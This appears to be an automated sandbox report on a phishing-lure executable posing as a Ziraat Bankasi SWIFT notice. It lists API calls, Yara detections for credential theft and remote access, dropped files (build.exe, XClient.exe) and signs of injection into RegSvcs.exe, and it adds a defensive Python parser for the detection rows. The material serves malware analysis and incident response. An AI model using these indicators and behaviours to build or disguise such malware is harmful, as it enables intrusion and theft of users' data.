Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST5268.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST5269.tmp VolumeInformation
Source: C:\Windows\System32\msdtc.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Locator.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00434E87
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00441E06 GetUserNameW, 0_2_00441E06
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00433F3A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_004049A0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 9.2.RegSvcs.exe.3d96458.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.5390000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.5300000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.5390000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3d95570.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.5300ee8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.2a20f3e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.5300ee8.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.5300000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3dfb390.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1311146517.0000000003D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1307610428.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1312948986.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1312584918.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1311146517.0000000003F3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1311146517.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.1301567190.0000000000EF2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build.exe PID: 7280, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Source: Yara match File source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: XClient.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Binary or memory string: WIN_81
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Binary or memory string: WIN_XP
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Binary or memory string: WIN_XPe
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Binary or memory string: WIN_VISTA
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Binary or memory string: WIN_7
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Binary or memory string: WIN_8
Source: niellist.exe, 00000011.00000002.1407658535.00000000004B4000.00000002.00000001.01000000.00000004.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match File source: 9.2.RegSvcs.exe.3d96458.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.5390000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.5300000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.5390000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3d95570.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.5300ee8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.2a20f3e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.5300ee8.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.5300000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3dfb390.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1311146517.0000000003D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1307610428.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1312948986.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1312584918.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1311146517.0000000003F3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1311146517.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.1301567190.0000000000EF2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build.exe PID: 7280, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Source: Yara match File source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: XClient.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00476283
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00476747
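The two Yara-match listings above (under Stealing of Sensitive Information and Remote Access Functionality) repeat the same evidence in the sandbox's own naming scheme: `<index>.<dump>.<process>.<address>.<n>[.raw].unpack` for carved PE files, eight-field `.sdmp` names for raw memory dumps, `Process Memory Space: <name> PID: <n>` rows, and `DROPPED` file paths. The practical question a responder has to answer from those rows is which process only ran a file that is also on disk, and which process carried a payload in memory it does not own. The script below is an added example, not part of the report: it parses a handful of rows copied from the listings above, groups hits by sandbox process index, joins them to PIDs, and flags processes whose matched regions are not MEM_IMAGE. It assumes that the seventh field of the `.sdmp` name is the Windows memory Type value (the three values present in this report, 0x20000, 0x40000 and 0x1000000, are exactly MEM_PRIVATE, MEM_MAPPED and MEM_IMAGE); the field layout is otherwise treated as opaque.

```python
import re

# Rows copied from the two Yara-match listings above (Joe Sandbox
# "Source: Yara match File source: <src>, type: <TYPE>" format).
SAMPLE_ROWS = r"""
Source: Yara match File source: 9.2.RegSvcs.exe.3d96458.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.5300000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1311146517.0000000003D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1312948986.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.1301567190.0000000000EF2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build.exe PID: 7280, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Source: Yara match File source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XClient.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
"""

ROW_RE = re.compile(r"^Source: Yara match File source: (?P<src>.+), type: (?P<kind>[A-Z]+)$")
# Carved PE: <proc-index>.<dump-index>.<process>.<address>.<n>[.raw].unpack
UNPACK_RE = re.compile(
    r"^(?P<pidx>\d+)\.\d+\.(?P<proc>.+?\.exe)\.(?P<addr>[0-9a-fA-F]+)\.\d+(?:\.raw)?\.unpack$"
)
# Memory dump: eight dot-separated fields, all hex except the third.
SDMP_RE = re.compile(
    r"^(?P<pidx>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.(?P<addr>[0-9A-Fa-f]{16})"
    r"\.[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.(?P<mtype>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$"
)
PIDROW_RE = re.compile(r"^Process Memory Space: (?P<name>.+?) PID: (?P<pid>\d+)$")

# Assumption: the seventh dump-name field is the MEMORY_BASIC_INFORMATION
# Type value; the three values in this report match the MEM_* constants.
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


def parse_rows(text):
    """Yield (source, kind) for every well-formed Yara-match row."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            yield m.group("src"), m.group("kind")


def summarize(text):
    """Group Yara hits by sandbox process index and collect dropped files."""
    procs = {}          # process index -> details
    pid_by_name = {}    # "RegSvcs.exe" -> 7196
    dropped = []

    def proc(idx):
        return procs.setdefault(idx, {"name": None, "pid": None, "regions": []})

    for src, kind in parse_rows(text):
        if kind == "DROPPED":
            if src not in dropped:
                dropped.append(src)
        elif kind == "UNPACKEDPE":
            m = UNPACK_RE.match(src)
            if m:
                proc(int(m["pidx"]))["name"] = m["proc"]
        elif kind == "MEMORY":
            m = SDMP_RE.match(src)
            if m:
                mtype = int(m["mtype"], 16)
                region = (int(m["addr"], 16), MEM_TYPES.get(mtype, hex(mtype)))
                regions = proc(int(m["pidx"], 16))["regions"]
                if region not in regions:
                    regions.append(region)
        elif kind == "MEMORYSTR":
            m = PIDROW_RE.match(src)
            if m:
                pid_by_name[m["name"]] = int(m["pid"])

    for p in procs.values():
        p["pid"] = pid_by_name.get(p["name"])
        # A hit outside every MEM_IMAGE region means the matched PE was not
        # loaded from the process's own on-disk module: the payload sits in
        # private or mapped memory, the shape an injected host process shows.
        p["hit_in_unbacked_memory"] = any(t != "MEM_IMAGE" for _, t in p["regions"])
    return {"processes": procs, "dropped": dropped}


if __name__ == "__main__":
    s = summarize(SAMPLE_ROWS)
    for idx, p in sorted(s["processes"].items()):
        flag = "UNBACKED" if p["hit_in_unbacked_memory"] else "image"
        print(f"[{idx:2d}] {p['name']:<12} PID {p['pid']}  regions={len(p['regions'])}  {flag}")
    for path in s["dropped"]:
        print("dropped:", path)
```

On the sample rows the output separates the two cases cleanly: RegSvcs.exe (PID 7196) has hits only in MEM_PRIVATE and MEM_MAPPED regions, while build.exe and XClient.exe match at their own MEM_IMAGE base (0xEF2000 and 0xCF2000). For a Microsoft-signed .NET utility such as RegSvcs.exe that is the signal to treat it as a host for injected code rather than as the malware itself, and to hunt on the dropped paths (Temp\build.exe, Temp\XClient.exe, Roaming\XClient.exe) and on RegSvcs.exe instances started from a user profile.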
IP geolocation map legend (share of contacted IPs per country): No. of IPs < 25%; 25% to 50%; 50% to 75%; 75% and above.